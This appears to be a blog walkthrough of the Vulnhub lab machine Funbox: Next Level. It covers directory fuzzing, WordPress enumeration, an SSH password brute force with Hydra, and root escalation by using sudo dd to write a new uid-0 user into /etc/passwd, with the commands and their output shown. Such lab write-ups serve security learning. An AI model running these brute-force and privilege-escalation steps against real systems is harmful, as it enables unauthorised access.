Lets separate the script-kids from script-teenies.
Hint: The first impression is not always the right one!

No updates for a few days; I was away for work for a bit and I’ve been partway through a few things - but now I’ve completed Funbox: Next Level. Here’s how.


Not much to say here, we’ve just got SSH on 22 and HTTP on Port 80. Nmap says Port 80 is Apache; presumably that’s where we are looking.

Drupal; but not really

So gobuster quickly tells us that we’ve got a drupal directory, so that seems like a good place to look. Except when we try to look inside of that directory:

root@kali:/opt/vulnhub/nextlevel# gobuster dir -u -w /usr/share/dirb/wordlists/common.txt

gobuster gets sad and says:

(Client.Timeout exceeded while awaiting headers)

Hmm, what’s going on? If we visit in Firefox, we get a message that it is waiting for This is not an IP on my network, so is unreachable - and no wonder gobuster times out. So what is happening? Somehow the server is trying to do a redirect to an IP address that doesn’t exist - what do we do?

Fortunately, WFUZZ doesn’t care about that:

root@kali:/opt/vulnhub/nextlevel# wfuzz -c --hh 274 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

This brings up a couple of interesting things, including wp-login. So are we actually running wordpress? Spoiler alert: yes.


Normally I’d run wpscan on a wordpress site and frankly this was no exception. But how do we deal with the redirect? There is a switch we can use to ignore it:


Running wpscan -e turns up two users; ben and admin. Also xmlrpc is enabled, so we can try a password attack:

root@kali:/opt/vulnhub/nextlevel# wpscan --url --ignore-main-redirect --force -U 'ben,admin' -P /usr/share/seclists/Passwords/probable-v2-top12000.txt

However, it doesn’t work. Now what?

et tu, Bruteforce?

Well, we know one of our usernames, so let’s see what Hydra thinks:

root@kali:/opt/vulnhub/nextlevel# hydra -l ben -P /usr/share/wordlists/rockyou.txt ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2020-09-30 12:04:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344400 login tries (l:1/p:14344400), ~896525 tries per task
[DATA] attacking ssh://
[STATUS] 177.00 tries/min, 177 tries in 00:01h, 14344224 to do in 1350:41h, 16 active
[22][ssh] host:   login: ben   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra ( finished at 2020-09-30 12:06:58

Boom, we’re in. We can ssh in as ben.

On the box

On the box, life is still a little difficult. We’ve got no head, tail or cat. Maybe others too, but that’s what I tried and they all didn’t work. Which made linpeas sad too. Is there a way to get around not being able to read files? Sure:

ben@funbox5:/$ python3 -c 'import sys; sys.stdout.write(' < /etc/passwd

So that’s useful. With it, we can read Ben’s mail:

From  Mon Aug 31 15:04:50 2020
Return-Path: <>
Received: from funbox4 (localhost [])
	by (8.15.2/8.15.2/Debian-3) with SMTP id 07VD43wQ015008
	for ben@localhost; Mon, 31 Aug 2020 15:04:40 +0200
Date: Mon, 31 Aug 2020 15:04:03 +0200
Message-Id: <>
Status: RO
X-UID: 3                                                 

Hi Ben,

please come to my office at 10:00 a.m. We have a lot to talk about!
The new employees must be created. Ive already finished Adam.

So now we can su as Adam.


What can Adam do? Adam can use dd as root. Also de and df, whatever they are. Actually de doesn’t exist, and I didn’t worry about df.

adam@funbox5:~$ sudo -l
[sudo] password for adam: 
Matching Defaults entries for adam on funbox5:

User adam may run the following commands on funbox5:
    (root) PASSWD: /bin/dd
    (root) PASSWD: /bin/de
    (root) PASSWD: /bin/df


What can we do with dd? GTFOBins says we can read and write privileged files. So how about we try writing to /etc/passwd? We essentially want to append a new line. I’ll do that by using dd to do a read of /etc/passwd into a temporary file, I’ll append a new line to that, and then I’ll overwrite the real /etc/passwd with my copy. Sounds good? Let’s see:

adam@funbox5:/tmp$ sudo -u root /bin/dd if=/etc/passwd > temp
adam@funbox5:/tmp$ python3 -c 'import sys; sys.stdout.write(' < temp
-- SNIPPED - just made sure it worked okay --
adam@funbox5:/tmp$ openssl passwd mrcake
adam@funbox5:/tmp$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> temp
adam@funbox5:/tmp$ INFILE=temp
adam@funbox5:/tmp$ OUTFILE=/etc/passwd
adam@funbox5:/tmp$ sudo -u root /bin/dd if=$INFILE of=$OUTFILE
4+1 records in
4+1 records out
2065 bytes (2.1 kB, 2.0 KiB) copied, 0.000658541 s, 3.1 MB/s
adam@funbox5:/tmp$ su root2
root@funbox5:/tmp# cd /root
root@funbox5:~# cat flag.txt

Made with ❤ by @0815R2d2
Please, tweet me a screenshot on Twitter.
THX 4 playing this Funbox.

Thank you, 0815R2d2.